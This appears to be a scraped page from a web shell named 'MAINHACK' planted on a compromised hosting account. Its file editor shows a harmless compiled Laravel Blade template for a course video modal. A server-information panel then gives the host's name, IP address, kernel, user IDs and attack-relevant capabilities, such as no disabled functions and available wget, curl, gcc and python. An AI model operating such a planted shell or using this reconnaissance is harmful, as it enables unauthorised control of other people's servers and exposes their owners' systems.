[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: c9db52358b128db80d143e60c18a3ccd9f192900.php
<div class="modal fade" id="playVideo" tabindex="-1" aria-labelledby="playVideoLabel" aria-hidden="true"> <div class="modal-dialog modal-lg modal-dialog-centered"> <div class="modal-content py-20"> <div class="d-flex align-items-center justify-content-between px-20"> <h3 class="section-title after-line"></h3> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <i data-feather="x" width="25" height="25"></i> </button> </div> <div class="mt-25 position-relative"> <div class="px-20"> <div class="file-video-loading align-items-center justify-content-center py-50 text-center"> <img src="/assets/default/img/loading.gif" width="100" height="100"> </div> <div class="js-modal-video-content d-none"> </div> </div> <?php $notAllowSource = ['iframe', 'google_drive']; ?> <div class="modal-video-lists mt-15"> <?php if(!empty($filesWithoutChapter) and count($filesWithoutChapter)): ?> <?php $__currentLoopData = $filesWithoutChapter; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $video): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <?php if($video->isVideo() and !in_array($video->storage, $notAllowSource)): ?> <?php echo $__env->make('web.default.course.tabs.play_modal.video_item', ['video' => $video], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> <?php endif; ?> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> <?php endif; ?> <?php if(!empty($fileChapters) and count($fileChapters)): ?> <?php $__currentLoopData = $fileChapters; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $fileChapter): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <?php if(!empty($fileChapter->files) and count($fileChapter->files)): ?> <?php $hasVideoForPlay = false; foreach($fileChapter->files as $video) { if ($video->isVideo() and !in_array($video->storage, $notAllowSource)) { $hasVideoForPlay = true; } } ?> <?php if($hasVideoForPlay): ?> <div class="d-flex justify-content-between align-items-center my-15 px-20"> <h3 class="section-title after-line"><?php echo e($fileChapter->title); ?></h3> </div> <div class="accordion-content-wrapper mt-15" id="videosAccordion" role="tablist" aria-multiselectable="true"> <?php $__currentLoopData = $fileChapter->files; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $video): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <?php if($video->isVideo() and !in_array($video->storage, $notAllowSource)): ?> <?php echo $__env->make('web.default.course.tabs.play_modal.video_item', ['video' => $video], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> <?php endif; ?> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> <?php endif; ?> <?php endif; ?> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> <?php endif; ?> </div> </div> </div> </div> </div> <?php /**PATH /home/aoneqssk/public_html/resources/views/web/default/course/tabs/play_modal/play_modal.blade.php ENDPATH**/ ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285